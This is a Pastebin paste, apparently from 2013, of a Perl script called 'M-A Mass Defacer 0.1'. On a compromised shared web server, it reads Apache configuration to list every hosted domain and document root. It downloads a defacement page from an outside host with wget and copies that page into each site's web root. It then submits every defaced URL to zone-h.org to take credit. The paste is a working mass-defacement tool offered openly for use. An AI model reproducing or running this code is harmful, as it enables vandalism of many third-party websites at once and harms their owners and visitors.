Advertisement
m-a_labz

M-A Mass Defacer 0.1

Aug 26th, 2013
421
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.21 KB | None | 0 0
  1. #!/usr/bin/perl
  2. # M-A Mass Defacer 0.1
  3. # by : b0y h4ck3r
  4. # gr33tz : Mr_Anarshi-T & FOXY
  5. # H0m3 : WwW.SeC4EvEr.CoM
  6. # perl main.pl zone to submite sites to zone-h.org
  7. # http://www.youtube.com/watch?v=M9449bs9XNM
  8. use IO::Socket::INET;
  9. ## general configuration
  10. my %gconf = (
  11.     "defacer"           => "defacer", # Your Zone-H.org nickname
  12.     "indexpath"         => "http://www.g00l3.c0m/r00t.html", # Your index path
  13.     "indexname"         => "r00t.php", # please leave the extension php :D
  14.     );
  15. ############
  16. print "\n[+] M-A Mass Defacer 0.1\n";
  17. sleep 0.2;
  18. ## httpd.conf paths ##
  19. if (-e "/usr/local/apache/conf/httpd.conf")
  20. {
  21. $httpdconf = "/usr/local/apache/conf/httpd.conf";
  22. }
  23. elsif (-e "/etc/httpd/conf/httpd.conf")
  24. {
  25. $httpdconf = "/etc/httpd/conf/httpd.conf";
  26. }
  27. elsif (-e "/usr/local/etc/apache22/httpd.conf")
  28. {
  29. $httpdconf = "/usr/local/etc/apache22/httpd.conf";
  30. }
  31. ######## start grapping domains
  32. print "[+] Grapping Hosted Domains Using Method 1\n";
  33. system("grep \"^    ServerName\" $httpdconf | sed \"s/    ServerName//g\" | sed \"s/ //g\" >> domains.txt");
  34. if (-e "domains.txt")
  35. {
  36. print "[+] D0ne Grapping Hosted Domains\n";
  37. }
  38. else
  39. {
  40. print "[-] Can't Grap Hosted Domains Using Method 1\n";
  41. sleep 0.2;
  42. exit();
  43. }
  44. # End grapping domains saved to domains.txt
  45. # Getting index :
  46. system("wget $gconf{'indexpath'} -O $gconf{'indexname'} && cp $gconf{'indexname'} /tmp/$gconf{'indexname'}");
  47. # Mass Attack Started
  48. # Method 1
  49. ## getting paths
  50. system("grep \"^    DocumentRoot\" $httpdconf | sed \"s/    DocumentRoot //g\" >> paths.txt");
  51. open (paths, "<paths.txt") || die "[-] Can't Find paths.txt !";
  52. ## open paths.txt and start mass attacking
  53. my @paths = <paths>;
  54. close paths;
  55. foreach $path (@paths)
  56. {
  57. chomp $path;
  58. system("cp /tmp/$gconf{'indexname'} $path");
  59. }
  60. if ($ARGV[0] =~ "zone" )
  61. {
  62. # posting to zone-h
  63. print "[+] Submitting To Zone-h.Org\n";
  64. $domain_list = "domains.txt";
  65. ## sorting domains.txt
  66. open (site, "<domains.txt") || die "[-] Can't open the List of site file !";
  67. @domains = <site>;
  68. close site;
  69. foreach  $hacked (@domains) {
  70. chomp $hacked;
  71. $url = $hacked."/".$gconf{'indexname'};
  72. open(ma,">>defeaced.txt");
  73. print ma "$url\n";
  74. close(ma);
  75. }
  76. ##
  77. $defacer = "$gconf{'defacer'}";
  78. $defeaced = "defeaced.txt";
  79. chomp $defeaced;
  80. open(a,"<$defeaced");
  81. @site = <a>;
  82. close(a);
  83. $b = scalar(@site);
  84. for($a=0;$a<=$b;$a++)
  85. {
  86. chomp $site[$a];
  87. $sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or next;
  88. print $sock "POST /notify/single HTTP/1.0\r\n";
  89. print $sock "Accept: */*\r\n";
  90. print $sock "Referer: http://www.zone-h.org/notify/single\r\n";
  91. print $sock "Accept-Language: en-us\r\n";
  92. print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
  93. print $sock "Connection: Keep-Alive\r\n";
  94. print $sock "User-Agent:  Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0)\r\n";
  95. print $sock "Host: www.zone-h.org\r\n";
  96. $length=length("defacer=$defacer&domain1=http%3A%2F% 2F$site[$a]&hackmode=17&reason=1");
  97. print $sock "Content-Length: $length\r\n";
  98. print $sock "Pragma: no-cache\r\n";
  99. print $sock "\r\n";
  100. print $sock "defacer=$defacer&domain1=http%3A%2F%2F$site[$a]&hackmode=17&reason=1\r\n";
  101. close($sock);
  102. }
  103. print "[+] D0ne :)";
  104. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement